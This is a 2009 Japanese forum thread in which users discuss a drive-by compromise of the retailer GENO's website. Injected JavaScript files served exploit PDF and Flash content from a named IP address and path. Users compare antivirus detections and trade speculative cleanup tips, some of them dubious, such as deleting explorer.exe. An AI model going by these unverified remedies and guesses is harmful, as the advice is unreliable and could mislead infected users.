AdobeReader入れてない人は関係無さげだから少しは良かったじゃん。
AdobeReader9.1だけどブラウザ落ちたよ。 ノートンとニフティオンラインでスキャンしたけど検知なし。 数日後には対応しているかもだからそれまで買い物とかは控えようと思う。
ポート2223 つったら RockWell CSP3 か・・・・ ルーターで開けてない限り何も無いと思うけど 感染済み(トロイがポート開けてる)PC探してるのかな
いまさっきGENO見て、Adobe Readerエラー出てきた俺が飛んできましたよ
結論から言うと、
>>159 と
>>207 の状態だね
しかも複数の.jsに仕込まれてる
ajax_lib.js
anketo_form.js
banner_koukoku.js
geno_topxml.js
geno_xml01.js
osusume.js
salesplash.js
とりあえず確認したのはこれくらい
俺のところではPDFは確認できなかったが、
/news/?id=3 で、T44.swfってFlashをダウンロードしてた
というわけで今から何仕込まれてるのか調べてくる
>>930-931 UrchinはGoogleのWeb解析ソフト。問題なし
foxit readerならOK?
944 :
SM-3(千葉県) :2009/04/05(日) 09:58:59.87 ID:ilYpXZIZ BE:103735049-2BP(433)
>>942 PDFの方は大丈夫だけど
Flashは別問題じゃね?ブラウザの設定しだいになる
DSP版XPを買ったら中古のPC100、128MBメモリをつけてきたGenoか
俺もAdobeReader9.1だけどブラウザ落ちた。 カスペも無反応だったし、検索しても検知なし。 USBから起動するパスワード管理ソフト使ってるので PC内にはクレカやネットバンクのパスワードはないから 少しは安心してるけど・・・。 とりあえず今できる対策ってあります?
>>945 それは秋葉でもあるけどね〜>ゴミメモリ
Avast最新なんだがひっかからなかった Webシールドを標準にしてると駄目だったりするのか?
セキュリティホールと言うよりgetPlusを利用されてるだけでアドベのチョンボじゃないの?
まて・・・長屋ってなんだ?
>>945 ケースの中に貼り付けておけば何の問題もなく認証通せるんだから良いだろ
邪魔にならない
Avira検出。 AdobeReader9.10入れてるけど落ちた。 キャッシュ消したら落ちなくなった・・・。
Adobeとか冗談だろ
ウイルスセキュリティZEROは反応ないけど不安だからオンラインスキャン逝ってくる
955 :
PAC-3(北海道) :2009/04/05(日) 10:08:49.45 ID:SJFT5u/E
122.221.10.234がwww.geno-web.jpのIPらしいが ググって見たら去年の12月あたりにコメントスパムの踏み台に使われまくってたようだな
956 :
SM-3(千葉県) :2009/04/05(日) 10:10:48.18 ID:ilYpXZIZ BE:40341072-2BP(433)
explorer.exeがユーザー名ではなく”SYSTEM”になっていたら 即削除しないと危険
ccc.exeが起動してる・・・・
>>944 うわぁ、テンポラリフォルダに94.247.2.195/news/?id=3あったわ・・・
やべーな、フラッシュなんて全然更新してなかったから昔のままだわ。
しかもウィルスソフトはシマンテックだし・・・・
antivir大敗北なのけ?w avastにもどるわw
全員、アウトぉ〜
>>941 /news/?id=3 で、T44.swfっていうのはどこ見ればわかるの?
.swfはランダムファイル名だと思うんだけど・・・・
アドレスはやっぱり94.247.2.195?
N速って情弱情弱って馬鹿にするわりには このスレ酷い初心者っぷりが滲み出てますねwwwwwwwww
964 :
PAC-3(神奈川県) :2009/04/05(日) 10:24:07.65 ID:D1ll0gEQ
>>964 言い換えれば物好きな勇者が多いって証拠です。
.|.-=・‐. ‐=・=- |;;/
10時過ぎても放置とか流石過ぎる。
968 :
PAC-3(アラバマ州) :2009/04/05(日) 10:29:51.88 ID:t/pdQ5l5
linkhist.txtの中身みて唖然とした・・・
969 :
SM-3(アラバマ州) :2009/04/05(日) 10:31:23.74 ID:m6uSOzpp
IE8+Adobe Reader 9.1で踏んだらIE落ちた。 カスペとa squeredオンラインスキャンで異常なし。
970 :
SM-3(愛知県) :2009/04/05(日) 10:31:43.84 ID:vXoNm6eB
\(^o^)/オワタ
971 :
PAC-3(中国地方) :2009/04/05(日) 10:31:59.24 ID:B+TNxkmP
別スレで開いたらカスペ教授に怒られた マルウェアがなんたらかんたらと ギャーなくなったんだね
972 :
SM-3(茨城県) :2009/04/05(日) 10:32:44.68 ID:ZsqI05SR
まだ放置だなんて……GENO恐ろしい子!!
973 :
PAC-3(中部地方) :2009/04/05(日) 10:34:01.36 ID:LI7BgEL/
休日に対処するわけないだろ馬鹿
てすと
>>962 コマンドプロンプトで直に見るか、ファイルコピー→どこかのフォルダに貼り付け
でファイル名出てくるよ
>アドレスはやっぱり94.247.2.195?
Yes
何仕込まれてるか調べてみたが、とりあえず何もなさそうな気が・・・
Adobe ReaderもFlashも、最近のバージョンだったせいかな
976 :
SM-3(滋賀県) :2009/04/05(日) 10:35:19.94 ID:ajta7FYm
普通に見られるんですけど。@Pen3(Ubuntu 8.10)
977 :
PAC-3(東京都) :2009/04/05(日) 10:36:22.23 ID:7fk9pKbw
IE7で踏んでみたらIE起動する度に 問題が発生したので終了しますが出るんだけど どうすればいいの?
GENOの中の人は何やってんの!!
当然花見だろ
980 :
遺憾の意(石川県) :2009/04/05(日) 10:38:57.73 ID:+9bjQsyQ
GENO放置プレイいいかげんにしろ
>>977 XP SP2までならIEをアンインスコして火狐持っているなら火狐からMSのサイトなり何なりからIEをインスコすればいいと思うが
その前に念のためセーフモードの状態でウィルス検索した方がいいかも。
983 :
PAC-3(愛知県) :2009/04/05(日) 10:40:03.99 ID:qUTthbiB
そろそろまとめてくれないかなー
>>982 HOST:122x221x10x234.ap122.ftth.ucom.ne.jp
ゲノサイト落としたほうがいいかも知れんなw
986 :
SM-3(アラバマ州) :2009/04/05(日) 10:41:35.87 ID:bgG3HYOY
おまえらおはよう
987 :
九条(東日本) :2009/04/05(日) 10:41:54.74 ID:MS8oC9Mm
電凸まだかよ
ウィルス感染ごめんなさいセールに期待してる
989 :
遺憾の意(石川県) :2009/04/05(日) 10:43:24.95 ID:+9bjQsyQ
>>988 そこでまたウイルスの入ったPCを売るわけですね
990 :
SM-3(大阪府) :2009/04/05(日) 10:43:46.58 ID:Ule4VdBX
続々と他スレでGENO誘導貼られまくってるw
ウイルスの入ったサーバーで管理してる商品を買いますのはこわいでございますね
PDFアプリなんて元から入れてないな マニュアルなんて全く読まないしな
>>988 asusが回収したウィルス入りEeeBoxが売りに出されるのですね分かります
994 :
SM-3(関西地方) :2009/04/05(日) 10:46:36.55 ID:/Ezbsog7
次スレたのむ
995 :
SM-3(大阪府) :2009/04/05(日) 10:46:46.33 ID:ELJz1ZXf
Trj.Geno.Aに認定
211.1.219.73 こいつがさっきから繋いでくるようになった
997 :
九条(宮崎県) :2009/04/05(日) 10:47:55.06 ID:X2d2limI
1日に注文した俺は・・・・
998 :
SM-3(大阪府) :2009/04/05(日) 10:48:33.38 ID:ELJz1ZXf
俺なんてしょちゅう127.0.0.1とかいうとこからアクセスされてるよ。 半ばあきらめてるが。
999 :
PAC-3(中部地方) :2009/04/05(日) 10:49:05.84 ID:LI7BgEL/
このスレ埋めれば多少は拡散も緩まるだろ
1000ならGENO倒産
1001 :
1001 :
Over 1000 Thread